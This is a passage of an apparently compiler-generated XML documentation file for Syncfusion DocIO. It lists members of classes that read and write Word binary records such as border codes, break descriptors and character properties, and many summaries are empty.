            <param name="stream"></param>
            <param name="fib"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkNameStringTable.Add(System.String)">
            <summary>
            
            </summary>
            <param name="name"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkNameStringTable.Find(System.String)">
            <summary>
            
            </summary>
            <param name="name"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkNameStringTable.BookmarkCount">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkNameStringTable.Item(System.Int32)">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkNameStringTable.BookmarkNamesLength">
            <summary>
            Gets the length of the bookmark names.
            </summary>
            <value>The length of the bookmark names.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode">
            <summary>
            Summary description for BRC.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.DEF_NEW_BRC_LENGTH">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.m_dptLineWidth">
            <summary>
            width of a single line in 1/8 pt, max of 32 pt.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.m_brcType">
            <summary>
            border type code:
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.m_colorId">
            <summary>
            color code
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.m_colorExt">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.m_props">
            <summary>
            :5 1F00 width of space to maintain between border and text within border. 
                    Must be 0 when BRC is a substructure of TC. Stored in points. 
            :1 2000 when 1, border is drawn with shadow. Must be 0 when BRC is a substructure of the TC 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.#ctor(System.Byte[],System.Int32)">
            <summary>
            
            </summary>
            <param name="arr"></param>
            <param name="iOffset"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse byte array to brc structure
            </summary>
            <param name="arr"></param>
            <param name="iOffset"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.ParseNewBrc(System.Byte[],System.Int32)">
            <summary>
            Parse byte array to brc structure
            </summary>
            <param name="arr"></param>
            <param name="iOffset"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.Save(System.Byte[],System.Int32)">
            <summary>
            
            </summary>
            <param name="arr"></param>
            <param name="iOffset"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.SaveNewBrc(System.Byte[],System.Int32)">
            <summary>
            
            </summary>
            <param name="arr"></param>
            <param name="iOffset"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.Read(System.IO.BinaryReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.LineWidth">
            <summary>
            Width of a Line 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.BorderType">
            <summary>
            Border type code
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.Space">
            <summary>
            Width of space to maintain between border and text within border
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.Shadow">
            <summary>
            when true, border is drawn with shadow
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.LineColor">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.LineColorExt">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.IsDefault">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode.IsClear">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor">
            <summary>
            Summary description for BreakDescriptor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.m_ipgd">
            <summary>
            except in textbox BKD, index to PGD in plfpgd that describes the page this break is on.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.m_dcpDepend">
            <summary>
            number of cp's considered for this break; note that the CP's described by cpDepend in this break reside in the next BKD
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.m_iCol">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.m_options">
            <summary>
            Option flags.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.#ctor">
            <summary>
            Default constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.#ctor(System.IO.Stream)">
            <summary>
            Constructor with table stream parametr
            </summary>
            <param name="stream">table stream</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.Read(System.IO.Stream)">
            <summary>
            Fill class fields
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.Write(System.IO.Stream)">
            <summary>
            Write break descriptor structure to stream
            </summary>
            <param name="stream"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.Ipgd">
            <summary>
            Index to PGD in plfpgd.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.DcpDepend">
            <summary>
            Number of cp's considered for this break.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.Options">
            <summary>
            Options
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.TableBreak">
            <summary>
            Get/set table break option.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.ColumnBreak">
            <summary>
            Get/set column brake option.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.Marked">
            <summary>
            Get/set Marked option.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.Unk">
            <summary>
            Get/set fUnk option
            in textbox BKD, when == 1 indicates cpLim of this textbox is not valid.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor.TextOverflow">
            <summary>
            Get/set text overflows the end of this textbox option
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.DEF_BIT_TABLE_BREAK">
            <summary>
            Bit index for IsTableBreak flag.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.DEF_BIT_COLUMN_BREAK">
            <summary>
            Bit index for IsColumnBreak flag.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.DEF_BIT_MARKED">
            <summary>
            Bit index for IsMarked flag.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.DEF_BIT_LIMIT_VALID">
            <summary>
            Bit index for IsLimitValid flag.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.DEF_RECORD_SIZE">
            <summary>
            Size of the record in bytes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.m_field">
            <summary>
            Underlying structure.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.#ctor(System.Byte[])">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="data">Data to parse.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.#ctor(System.Byte[],System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.#ctor(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="iCount">Number of bytes for the new record.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.#ctor(System.IO.Stream,System.Int32)">
            <summary>
            Creates new record from stream.
            </summary>
            <param name="stream">Stream with record's data.</param>
            <param name="iCount">Number of bytes to parse.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.PageDescriptorIndex">
            <summary>
            Except in textbox BKD, index to PGD in plfpgd that describes
            the page this break is on (ipgd).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.itxbxs">
            <summary>
            in textbox BKD,
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.CharPosNumber">
            <summary>
            Number of cp's considered for this break;
            note that the CP's described by cpDepend
            in this break reside in the next BKD.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.Options">
            <summary>
            Option flags. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.ColumnIndex">
            <summary>
            ???
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.IsTableBreak">
            <summary>
            Indicates whether this is table break.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.IsColumnBreak">
            <summary>
            Indicates whether this is a table break.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.IsMarked">
            <summary>
            Used temporarily while word is running.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.IsLimitValid">
            <summary>
            In textbox BKD, when == True indicates cpLim of this textbox is not valid.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.IsTextOverflow">
            <summary>
            In textbox BKD, when == True indicates that text overflows the end of this textbox.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.UnderlyingStructure">
            <summary>
            Returns underlying structure. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorRecord.Length">
            <summary>
            Returns number of bytes needed to store record in a stream or in an array.
            Read-only.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorTable">
            <summary>
            Summary description for BinaryTable.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorTable.m_arrFC">
            <summary>
            Array of file positions (n+1).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorTable.m_arrEntry">
            <summary>
            Array of talbe entries (n).
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorTable.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorTable.#ctor(System.Byte[])">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="data">Data to parse.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorTable.#ctor(System.Byte[],System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorTable.#ctor(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="iCount">Number of bytes for the new record.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorTable.#ctor(System.IO.Stream,System.Int32)">
            <summary>
            Creates new record from stream.
            </summary>
            <param name="stream">Stream with record's data.</param>
            <param name="iCount">Number of bytes to parse.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorTable.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Parses record.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset in the data array to the records data.</param>
            <param name="iCount">Number of bytes to parse.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorTable.Parse(System.IO.Stream,System.Int32)">
            <summary>
            Parses record.
            </summary>
            <param name="stream">Stream with record's data.</param>
            <param name="iCount">Number of bytes to parse.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorTable.FileCharacterPos">
            <summary>
            Returns array of character positions. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorTable.Entries">
            <summary>
            Returns array of binary table entries. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptorTable.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties">
            <summary>
            Summary description for CharacterProperty.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.m_chpx">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.m_styleSheet">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.m_bFlags">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.#ctor(Syncfusion.DocIO.ReaderWriter.WordStyleSheet)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException,Syncfusion.DocIO.ReaderWriter.WordStyleSheet)">
            <summary>
            Initializing constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.HasOptions(System.Int32)">
            <summary>
            Determines whether the specified option has options.
            </summary>
            <param name="option">The option.</param>
            <returns>
            if the specified option has options, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.GetCopiableSprm">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.GetBoolean(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="record"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.GetFontName(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="record"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.GetBorder(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="record"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.GetShading(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="record"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.GetSymbol(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="record"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.GetColor(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="record"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.SetAllFontNames(System.String)">
            <summary>
            
            </summary>
            <param name="fontName"></param>      
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.SetFontName(System.String,System.Int32)">
            <summary>
            Sets the name of the font.
            </summary>
            <param name="fontName">Name of the font.</param>
            <param name="option">The option.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.AddSprm(System.Int32,System.Boolean)">
            <summary>
            Adds the SPRM.
            </summary>
            <param name="option">The option.</param>
            <param name="value">if set to <c>true</c> [value].</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.AddSprm(System.Int32,System.Byte)">
            <summary>
            Adds the SPRM.
            </summary>
            <param name="option">The option.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.AddSprm(System.Int32,System.UInt16)">
            <summary>
            Adds the SPRM.
            </summary>
            <param name="option">The option.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.AddSprm(System.Int32,System.Int16)">
            <summary>
            Adds the SPRM.
            </summary>
            <param name="option">The option.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.AddSprm(System.Int32,System.Int32)">
            <summary>
            Adds the SPRM.
            </summary>
            <param name="option">The option.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.CloneChpx">
            <summary>
            Clones internal chpx.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.RemoveSprm(System.Int32)">
            <summary>
            Removes the SPRM.
            </summary>
            <param name="option">The option.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.HasSprms">
            <summary>
            Determines whether this instance has Single Property Modifier Record Array.
            </summary>
            <returns>
            if this instance has Single Property Modifier Record Array, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.GetNewSprm(System.Int32)">
            <summary>
            Gets the new (added when track changes property is on) Single Property Modifier Record.
            </summary>
            <param name="option">The option.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.GetNewPropsStartIndex">
            <summary>
            Gets the index of the new (changed) character properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.ConvertColor(System.Int32)">
            <summary>
            Converts color to word color format
            </summary>
            <param name="brg"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.GetComplexBoolean(System.Byte,System.Boolean)">
            <summary>
            
            </summary>
            <param name="sprmValue"></param>
            <param name="styleSheetValue"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.ToString">
            <summary>
            Returns a <see cref="T:System.String"/> that represents the current <see cref="T:System.Object"/>.
            </summary>
            <returns>
            A <see cref="T:System.String"/> that represents the current <see cref="T:System.Object"/>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Sprms">
            <summary>
            Gets Sprm array
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.CharacterPropertyException">
            <summary>
            Gets CharacterPropertyException.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.ComplexScript">
            <summary>
            Gets/Sets the Complex script property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Bold">
            <summary>
            Gets/sets Bold property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.BoldComplex">
            <summary>
            Gets/sets Italic property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Italic">
            <summary>
            Gets/sets Italic property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.ItalicComplex">
            <summary>
            Gets/sets Italic property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Strike">
            <summary>
            Gets/sets Strike property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.ShadowComplex">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.StrikeComplex">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.DoubleStrike">
            <summary>
            Gets/sets DoubleStrtike property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.UnderlineCode">
            <summary>
            Gets/sets Underline property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontName">
            <summary>
            Gets/sets Font name property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontNameAscii">
            <summary>
            Gets/sets Font name property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontNameFarEast">
            <summary>
            Gets/sets Font name property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontNameNonFarEast">
            <summary>
            Gets/sets Font name property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontNameBi">
            <summary>
            Gets/sets Font name property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontAscii">
            <summary>
            Gets/sets FontAscii property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontFarEast">
            <summary>
            Gets/sets FontFarEast property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontNonFarEast">
            <summary>
            Gets/sets Non FontFarEast property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontBi">
            <summary>
            Gets/sets Non FontFarEast property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontSize">
            <summary>
            Gets/sets FontSize property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontSizeHP">
            <summary>
            Gets/sets FontSizeHP property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontColor">
            <summary>
            Gets/sets FontColor property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontColorExt">
            <summary>
            Gets/sets Extended FontColor property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.FontColorRGB">
            <summary>
            Gets/sets Extended FontColor property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.HighlightColor">
            <summary>
            Gets/sets BackGround color property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.SubSuperScript">
            <summary>
            Gets/sets Sub/Super/Non script property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Clear">
            <summary>
            Gets/sets Clear property
            </summary> Gets the sprm byte value and set sprm byte value to the corresponding sprm
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.PicLocation">
            <summary>
            Gets/sets Picture Location
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Outline">
            <summary>
            Gets/sets Outline property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Shadow">
            <summary>
            Gets/sets Shadow property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Emboss">
            <summary>
            Gets/sets Emboss property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.EmbossComplex">
            <summary>
            Gets/sets Emboss property (Complex).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Engrave">
            <summary>
            Gets/sets Engrave property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.EngraveComplex">
            <summary>
            Gets/sets Engrave property ( Complex )
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Hidden">
            <summary>
            Gets/sets Hidden property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.SpecVanish">
            <summary>
            Gets/sets SpecVanish property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.SmallCaps">
            <summary>
            Gets/sets SmallCaps property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.AllCaps">
            <summary>
            Gets/sets AllCapitalized property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.AllCapsComplex">
            <summary>
            Gets/sets AllCapitalized property ( Complex ).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Position">
            <summary>
            Gets/sets Font Position( raised/lowered ) property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.LineSpacing">
            <summary>
            Gets/sets Font Spacing property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Scaling">
            <summary>
            Gets/sets Font Scaling property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Kern">
            <summary>
            Gets/sets Font Kern property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterProperties.Shading">
            <summary>
